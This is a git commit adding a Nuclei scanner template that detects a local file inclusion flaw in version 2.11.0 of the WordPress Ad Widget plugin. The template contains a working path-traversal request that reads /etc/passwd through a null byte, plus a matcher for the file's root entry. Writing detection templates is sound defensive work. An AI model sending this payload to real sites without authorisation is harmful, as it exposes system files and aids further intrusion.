Auto Update Nuclei [Sat Nov 6 01:06:52 UTC 2021] :robot:

0x727 · Nov 6, 2021 · 845bb09 · 845bb09
1 parent 6c758b5
commit 845bb09
Showing 1 changed file with 27 additions and 0 deletions.
diff --git a/plugins/wordpress/ad-widget-lfi.yaml b/plugins/wordpress/ad-widget-lfi.yaml
@@ -0,0 +1,27 @@
+id: ad-widget-lfi
+
+info:
+  name: WordPress Plugin WordPress Ad Widget Local File Inclusion (2.11.0)
+  author: 0x_Akoko
+  severity: high
+  description: Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+  reference:
+    - https://cxsecurity.com/issue/WLB-2017100084
+    - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
+  tags: wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200